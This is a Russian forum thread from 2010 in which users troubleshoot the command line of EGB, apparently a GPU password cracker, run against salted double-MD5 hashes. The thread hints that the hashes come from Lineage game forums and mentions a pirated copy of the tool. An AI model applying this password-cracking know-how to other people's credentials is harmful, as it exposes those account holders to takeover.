/ Try [Ссылки могут видеть только зарегистрированные и активированные пользователи]
+ [19.04.2010 10:48:00]
+ Total: 1

что это может быть?

1. Форум лиц
2. Форум лиц - заплатка

sunches
19.04.2010, 11:16
спасибо теперь проблемка в egb

D:\>egb\"md5(md5($salt).md5($pass)).exe" conf.ini conf.txt
Number of GPU to be used: 1
Error reading file!

Добавлено через 56 минут
перепбрал кучу линаговских форумов все стоят на 2,3,6

sunches
20.04.2010, 18:26
D:\>egb\"md5(md5($salt).md5($pass)).exe" conf.ini conf.txt
Number of GPU to be used: 1
Error reading file!

Народ помогите в чем проблема?

opig123
20.04.2010, 18:38
D:\>egb\"md5(md5($salt).md5($pass)).exe" conf.ini conf.txt
Number of GPU to be used: 1
Error reading file!

Народ помогите в чем проблема?

В тебе.
Надо так.
D:\>egb\"md5(md5($salt).md5($pass))" md5(md5($salt).md5($pass)).ini md5(md5($salt).md5($pass)).txt

Только врятли от этого будет толк т.к. у тебя скорей всего EGB не крякнутый, он проработает 3-5 мин и отрубится.